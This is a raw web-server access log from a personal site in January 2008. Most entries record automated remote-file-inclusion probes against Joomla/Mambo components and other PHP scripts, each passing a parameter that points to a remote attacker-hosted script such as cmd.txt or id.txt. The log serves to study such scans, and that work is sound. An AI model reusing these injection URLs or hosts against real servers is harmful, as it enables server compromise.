87.118.114.21 - - [31/Jan/2008:10:47:44 -0800] "GET /logs/access_080117.log//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [31/Jan/2008:10:48:02 -0800] "GET /logs/access_071230.log//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.245.27.77 - - [31/Jan/2008:10:49:40 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.121 - - [31/Jan/2008:10:51:10 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [31/Jan/2008:10:51:27 -0800] "GET //?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 200 2962 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.34.68.128 - - [31/Jan/2008:10:51:27 -0800] "GET /logs//?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 200 32546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:10:53:59 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:10:54:00 -0800] "GET /index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:10:54:00 -0800] "GET /logs/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:10:55:11 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:10:55:11 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:10:55:12 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:10:55:28 -0800] "GET /logs/access_080106.log/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.98.78.121 - - [31/Jan/2008:10:55:48 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.121 - - [31/Jan/2008:10:55:48 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.121 - - [31/Jan/2008:10:56:21 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:10:56:26 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.77 - - [31/Jan/2008:10:57:40 -0800] "GET /logs/access_071130.log HTTP/1.0" 200 58566 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.150.12 - - [31/Jan/2008:10:58:47 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [31/Jan/2008:10:58:48 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.245.27.77 - - [31/Jan/2008:11:01:16 -0800] "GET /logs/access_080103.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.245.27.77 - - [31/Jan/2008:11:01:16 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [31/Jan/2008:11:01:20 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [31/Jan/2008:11:01:20 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.150.12 - - [31/Jan/2008:11:02:30 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:11:04:05 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:11:04:56 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.245.27.77 - - [31/Jan/2008:11:05:29 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:06:27 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:06:28 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:06:28 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:06:31 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:06:31 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:06:32 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:11:06:56 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:07:24 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:07:26 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:11:07:41 -0800] "GET /logs/access_071224.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:08:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.20.118 - - [31/Jan/2008:11:08:56 -0800] "GET /logs/access_071013.log HTTP/1.0" 200 46816 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:09:31 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.242.208.120 - - [31/Jan/2008:11:11:18 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:11:11:41 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:11:11:41 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:11:11:44 -0800] "GET /logs/access_071110.log//photoalb/lib/static/header.php?set_menu=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:12:03 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:12:04 -0800] "GET /convert/mvcw.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:12:05 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:13:43 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:13:44 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:13:44 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.66.84 - - [31/Jan/2008:11:13:53 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:11:14:04 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:11:14:05 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
205.234.197.132 - - [31/Jan/2008:11:14:57 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [31/Jan/2008:11:16:04 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [31/Jan/2008:11:16:05 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [31/Jan/2008:11:16:06 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.110 - - [31/Jan/2008:11:17:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.166 - - [31/Jan/2008:11:17:18 -0800] "GET /megumi/?D=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.90.48.3 - - [31/Jan/2008:11:17:53 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
80.249.117.99 - - [31/Jan/2008:11:18:27 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.209.168 - - [31/Jan/2008:11:18:33 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:11:18:59 -0800] "GET /logs/access_071110.log//photoalb/lib/static/header.php?set_menu=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:11:18:59 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:11:19:00 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.66.84 - - [31/Jan/2008:11:19:27 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.61.66.84 - - [31/Jan/2008:11:19:28 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.238.65.152 - - [31/Jan/2008:11:19:41 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.61.66.84 - - [31/Jan/2008:11:20:08 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:11:20:43 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:11:20:43 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:11:20:44 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
205.234.197.132 - - [31/Jan/2008:11:21:07 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.197.132 - - [31/Jan/2008:11:21:07 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.74 - - [31/Jan/2008:11:21:19 -0800] "GET /megumi/earrings/?M=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.185.162.14 - - [31/Jan/2008:11:21:23 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
216.185.162.14 - - [31/Jan/2008:11:21:23 -0800] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.1" 200 858 "http://www.st-owners.com/forums/showthread.php?t=33420&page=5" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
216.185.162.14 - - [31/Jan/2008:11:21:30 -0800] "GET /bikes/GPS/WeSTOC2008/dmulk_WeSTOC08.gdb HTTP/1.1" 200 327680 "http://dmulk.com/bikes/GPS/WeSTOC2008/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
205.234.197.132 - - [31/Jan/2008:11:21:32 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.10.2 - - [31/Jan/2008:11:21:47 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://hornydate.co.uk/asc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.10.2 - - [31/Jan/2008:11:21:55 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hornydate.co.uk/asc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:11:22:53 -0800] "GET /logs/access_071105.log//photoalb/lib/static/header.php?set_menu=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [31/Jan/2008:11:23:03 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.219.235 - - [31/Jan/2008:11:24:51 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.217 - - [31/Jan/2008:11:26:23 -0800] "GET /bikes/dteel/03MAR07/?D=A HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:03 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:03 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:03 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:03 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:03 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:03 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:18 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:18 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:27:21 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:27:21 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:27:28 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:27:29 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:31 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:31 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:27:31 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:27:44 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:27:44 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:28:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:28:04 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:28:04 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:28:06 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:11:28:54 -0800] "GET /gallery/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:11:28:54 -0800] "GET /logs/gallery/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
24.23.164.127 - - [31/Jan/2008:11:29:01 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.34.78.106 - - [31/Jan/2008:11:29:12 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [31/Jan/2008:11:29:13 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [31/Jan/2008:11:29:19 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
